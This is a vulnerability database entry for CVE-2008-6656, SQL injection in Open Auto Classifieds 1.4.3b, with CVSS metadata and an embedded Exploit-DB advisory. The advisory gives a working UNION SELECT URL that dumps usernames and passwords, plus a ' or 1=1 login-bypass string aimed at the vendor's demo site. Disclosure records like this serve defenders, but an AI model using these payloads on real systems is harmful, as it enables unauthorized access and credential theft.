Search...

CVE-2008-6656

2009-04-07T14:17:00

ID CVE-2008-6656
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00

Description

Multiple SQL injection vulnerabilities in Open Auto Classifieds 1.4.3b allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to listings.php and (2) the username field to login.php.

JSON Vulners Source

Initial Source

{"id": "CVE-2008-6656", "bulletinFamily": "NVD", "title": "CVE-2008-6656", "description": "Multiple SQL injection vulnerabilities in Open Auto Classifieds 1.4.3b allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to listings.php and (2) the username field to login.php.", "published": "2009-04-07T14:17:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6656", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/29027", "http://osvdb.org/50255", "http://osvdb.org/50256", "https://exchange.xforce.ibmcloud.com/vulnerabilities/42158", "http://freshmeat.net/projects/openauto/releases/277061", "https://www.exploit-db.com/exploits/5531"], "cvelist": ["CVE-2008-6656"], "type": "cve", "lastseen": "2020-10-03T11:51:05", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:5531"]}], "modified": "2020-10-03T11:51:05", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-10-03T11:51:05", "rev": 2}, "vulnersScore": 7.3}, "cpe": ["cpe:/a:openautoclassifieds:open_auto_classifieds:1.4.3b"], "affectedSoftware": [{"cpeName": "openautoclassifieds:open_auto_classifieds", "name": "openautoclassifieds open auto classifieds", "operator": "eq", "version": "1.4.3b"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:openautoclassifieds:open_auto_classifieds:1.4.3b:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:openautoclassifieds:open_auto_classifieds:1.4.3b:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}

{"exploitdb": [{"lastseen": "2016-01-31T23:14:58", "description": "Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities. CVE-2008-6656. Webapps exploit for php platform", "published": "2008-05-02T00:00:00", "type": "exploitdb", "title": "Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6656"], "modified": "2008-05-02T00:00:00", "id": "EDB-ID:5531", "href": "https://www.exploit-db.com/exploits/5531/", "sourceData": "|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\nTitle :: Remote SQL Injection\n\n\nAuthor :: InjEctOr [s0f (at) w.cn]\n\n&& Fisher762 [SQ7 (at) w.cn]\n\n\n\nApplication :: Open Auto Classifieds vehicle listings manager v1.4.3b\n\nDownload :: http://mesh.dl.sourceforge.net/sourceforge/openauto/openauto_v1.4.3b.zip\n\n\nDork 1 :: use your mind\n\n\nGreets :: Allah , Muslims Hackers\n\nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.\n\n\n\n--------------------------------------------[C o n t e x t]-----------------------------------------\n\n\nExpl0!t::\n\nurl :\n\nhttp://127.0.0.1/listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users\n\n\nand bypass login:\n\nhttp://openautoclassifieds.com/login.php << from demo site :)\n\nin Username field just type ' or 1=1 /*\n\n\nnote:\n\nthere is a lot of versions in this script and every one using Different number of columns but the name of tbl and col is same\n\n# milw0rm.com [2008-05-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5531/"}]}